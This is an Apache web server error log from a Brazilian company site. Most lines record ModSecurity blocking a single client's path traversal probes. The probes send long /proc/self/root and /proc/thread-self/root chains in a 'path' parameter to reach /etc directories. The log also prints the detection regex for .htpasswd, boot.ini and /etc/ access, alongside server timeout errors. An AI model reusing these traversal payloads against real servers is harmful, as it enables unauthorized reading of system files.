[Thu Mar 19 06:52:50.835143 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:59766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHcgbLMZ6AikZjR9U9pgAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:55.840453 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:59772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHd9a6ubjKNq_cu4YodgAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:00.935239 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.243.128:56796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHfBkFeYa1D6dYQnDQLAAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:09.069849 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37284] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:53:14.366926 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.243.128:56804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHihkFeYa1D6dYQnDQOQAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:18.334913 2026] [:error] [pid 19093:tid 140411641214720] [client 74.7.243.128:47024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHjl_V7PWP6ixUYl6cpQAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:18.466082 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.244.43:40002] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvHjl_V7PWP6ixUYl6cpgAAAoo"]
[Thu Mar 19 06:53:22.645876 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:35264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHksdf6f5d65gmYZRU4gAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:26.612908 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:35264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHlsdf6f5d65gmYZRU5QAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:31.368428 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.243.128:38278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHmxkFeYa1D6dYQnDQPgAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:36.023185 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.243.128:38278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHoBkFeYa1D6dYQnDQRwAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:36.121778 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38034] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:53:40.202409 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:55496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHpAkwaGbbGflqUZCazgAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:45.211013 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:55510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHqeyqAr6etmhZHNpEWgAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:51.131040 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:54088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHr-yqAr6etmhZHNpEYgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:53:54.744115 2026] [access_compat:error] [pid 19093:tid 140411733534464] [client 216.73.216.191:7700] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 06:53:57.107577 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:54102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHteyqAr6etmhZHNpEaAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:54:02.562132 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:59470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHuQkwaGbbGflqUZCa4gAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:54:05.931005 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:59484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHvRkFeYa1D6dYQnDQbwAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:54:07.127776 2026] [proxy_fcgi:error] [pid 19093:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38922] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:54:10.911538 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:48006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHwvu8EFLIOrSqIpuCNgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:54:16.666422 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:48012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHyF_V7PWP6ixUYl6c1gAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:54:16.917329 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.243.128:48012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHyF_V7PWP6ixUYl6c2AAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:54:32.135638 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:54:57.145772 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40308] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:55:22.127745 2026] [proxy_fcgi:error] [pid 19093:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41040] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:55:49.713892 2026] [proxy_fcgi:error] [pid 19093:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41944] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:56:07.220745 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.243.128:47116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIN1_V7PWP6ixUYl6dFQAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:13.149824 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42550] AH01075: Error dispatching request to : (polling)
